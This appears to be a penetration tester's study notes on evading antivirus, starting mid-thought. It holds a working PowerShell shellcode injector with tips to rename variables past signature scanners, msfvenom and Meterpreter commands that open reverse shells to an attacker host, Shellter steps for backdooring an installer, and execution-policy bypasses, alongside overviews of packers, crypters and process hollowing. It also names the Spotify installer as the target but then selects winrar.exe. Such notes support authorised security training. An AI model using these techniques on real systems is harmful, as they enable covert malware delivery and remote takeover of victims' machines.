

Considering time limitations during a typical penetration test, it is far more efficient to target the specific antivirus product deployed in the target network.
##### Working with
	_Avira Free Security_ version 1.1.68.29553 on our Windows 11 client.

# PEs

PE format represents a Windows data structure that details the information necessary for the _Windows Loader_ to manage the wrapped executable code including required dynamic libraries, API import and export tables, etc.
  

# Thread Injection

## PowerShell In-Memory Injection

Will use a technique similar to *Remote Process Memory Injection*.
Main difference - we'll target the currently executing process: PowerShell Interpreter.

A very powerful feature of PowerShell is its ability to interact with the Windows API.
This allows us to implement the in-memory injection process in a PowerShell script.
One of the main benefits of executing a script rather than a PE is that it is difficult for antivirus manufacturers to determine if the script is malicious as it's run inside an interpreter and the script itself isn't executable code.
Keep in mind that some AV products handle malicious script detection with more success than others.

Furthermore, even if the script is marked as malicious, it can easily be altered.
Antivirus software will often review variable names, comments, and logic, all of which can be changed without the need to recompile anything.

As they often rely on static string signatures related to meaningful code portions, such as variables or function names.
As VirusTotal will scan this as malicious by numerous vendors (including Avira), we can swap out variable names to change it just enough for it to run

```powershell
$code = '
# Import _VirtualAlloc_ from kernel32.dll to allocate memory
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

# Import _CreateThread_ from kernel32.dll to create an execution thread
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

# Import memset from msvcrt.dll to write arbitrary data to the allocated memory using _VirtualAlloc_, which takes each byte of the payload stored in the _$sc_ byte array and writes it to our newly-allocated memory block using _memset_.
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

# Use different variable names to avoid detection
$var2 = 
  Add-Type -memberDefinition $code -Name "iWin32" -namespace Win32Functions -passthru;

# Allocate a block of memory
[Byte[]];
[Byte[]]$var1 = <place your shellcode here>;

$size = 0x1000;

if ($var1.Length -gt 0x1000) {$size = $var1.Length};

$x = $var2::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($var1.Length-1);$i++) {$var2::memset([IntPtr]($x.ToInt32()+$i), $var1[$i], 1)};

# In-memory written payload is executed in a separate thread using the _CreateThread_ API
$var2::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
```
  
Payload (meterpreter) creation:  
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f powershell -v sc
```


Since the msfvenom payload is for x86, we are going to launch the x86 version of PowerShell, named _Windows PowerShell (x86)_

**NOTE:**
Although the PowerShell AV bypass we covered in this module is substantial, it has an inherent limitation:  
The malicious script cannot be "double-clicked" by the user for an immediate execution. Instead, it would open in **notepad.exe** or another default text editor.  
  
The tradecraft of manually weaponizing PowerShell scripts is beyond the scope of this module, but we can rely on another open-source framework to help us automate this process.  
Research how to install and use the [Veil](https://github.com/Veil-Framework/Veil) framework to help  

# Execution Policy
In order to get it to run, you need to be mindful of the user's [Execution Policy](Execution%20Policy.md).  

View & Change policy:  
```powershell
C:\Users\offsec\Desktop> powershell  
Windows PowerShell  
Copyright (C) 2015 Microsoft Corporation. All rights reserved.  
  
PS C:\Users\offsec\Desktop> Get-ExecutionPolicy -Scope CurrentUser  
Undefined  
  
PS C:\Users\offsec\Desktop> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser  
  
PS C:\Users\offsec\Desktop> Get-ExecutionPolicy -Scope CurrentUser  
Unrestricted
```
  
Can also bypass the policy on a per-script basis:  
```powershell
ExecutionPolicy -Bypass
```

  
  
# Shellter

[Shellter](Tools.md#Shellter) is a dynamic shellcode injector which can bypass AVs.
It essentially performs a thorough analysis of the target PE file and the execution paths.
It then determines where it can inject our shellcode without relying on traditional injection techniques that are easily caught by AV engines.
- Includes changing of PE file section permissions, creating new sections, etc.
It then attempts to use the existing PE Import Address Table (IAT) entries to locate functions that will be used for the memory allocation, transfer, and execution of our payload.
  
We'll run in Auto mode for this example

Download 32-bit version of [Spotify Installer](https://www.spotify.com/de-en/download/windows/) onto Kali  
  
In Shellter:  
- Select a Target PE (full/path/**winrar.exe**)  
- Choose Stealth Mode - Y  
- Choose Payload - Meterpreter Reverse TCP  
- Set Meterpreter Options - LHOST & LPORT  
  
In Kali:  
- Start a Meterpreter listener to catch the conn:  
```bash
msfconsole -x "use exploit/multi/handler; set LHOST <attacker_ip>; set LPORT <port>; set PAYLOAD windows/meterpreter/reverse_tcp"
```

Transfer file to compromised Win machine.  
  
*****NOTE:** As it stands, the successful Meterpreter session will close out once the installer is either finished running OR is cancelled.  
  
Add an _AutoRunScript_ to migrate Meterpreter to a separate process immediately after session creation:  
```bash
set AutoRunScript post/windows/manage/migrate
```

Run compromised binary




# On-Disc



4 techniques to obfuscate files on-disk:  
  
#### Packers: 
- Originally designed to reduce the size of an executable while maintaining a functionally equivalent/ completely new binary structure.  
	- Ex: [upx](upx.md) is a [PE](Portable%20Executable.md) tool  
- Results in new signature  
- Not sufficient on its own for evasion of modern AV scanners.  
  
  
#### Obfuscators:  
- Reorganize & mutate code to make it difficult to re-engineer  
	- Replacing instructions w/ semantically equivalent ones  
	- Inserting _dead code_  
	- Splitting/ reordering functions  
	- etc  
- Marginally effective against sig-based AVs  
  
  
#### Crypters:
- Cryptographically alters code  
- Adds decrypting stub that restores OG code upon execution.  
	- Decryption happens _in-memory_  
- One of the most effective evasion techniques.  
  
  
#### Software Protectors:
- A range of features and technologies to help protect the executable file from hacking, analysis, modification and disassembly.  
- Designed for legit purposes, but can be utilized for AV evasion  
  
Highly effective antivirus evasion requires a combination of all of the above techniques + other advanced ones, including anti-reversing, anti-debugging, virtual machine emulation detection, etc.


# In-Memory



AKA: [PE](Portable%20Executable.md) _Injection_  
  
- Focuses on the manipulation of volatile memory  
- Doesn't write any files to disk - one the main areas of focus for most antivirus products.  
- Main benefits of executing a script, rather than a PE, is that it's difficult for AVs to determine if the script's malicious or not as it's run inside an interpreter and the script itself isn't executable code  
- Even if marked malicious, variable names, comments, and logic can be altered w/o having to re-compile  
  
\*\*\*Several techniques available, but mats only cover PowerShell as the others rely on low level programming like C/C++***  
  
  
#### Remote Process Injection:  
- Injecting payload into valid/ non-malicious PE  
- Most commond method by using Win APIs:  
	→ _OpenProcess_  
- Used to obtain a valid Handle to target a process we have perms to access.  
	→ _VirtualAllocEx_  
- Used to allocate RAM in the context of that process  
	→ _WriteProcessMemory_  
- Copy malicious payload to newly allocated RAM  
	→ _CreateRemoteThread_  
- Executed in RAM in separate thread  
  
  
#### [Reflective DLL](https://andreafortuna.org/2017/12/08/what-is-reflective-dll-injection-and-how-can-be-detected/) Injection: 
- Attempts to load a DLL stored by the attacker in the process memory.  
- Difficult as attacker must write their own version of _LoadLibrary_ that does not rely on a loading a disk-based DLL.  
  
  
#### Process Hollowing: 
- First launch a non-malicious process in a suspended state  
- Image of the process is removed from RAM and replaced w/ the malicious image  
- Process is resumed & malicious code is executed  
  
  
#### Inline Hooking:
- Modifies RAM and introduces a hook into a function to point the execution flow to malicious code  
	→ Hook: Instructions that redirect code exectution.  
- After execution of malicious code, flow returns back to modified function and resumes normal code execution



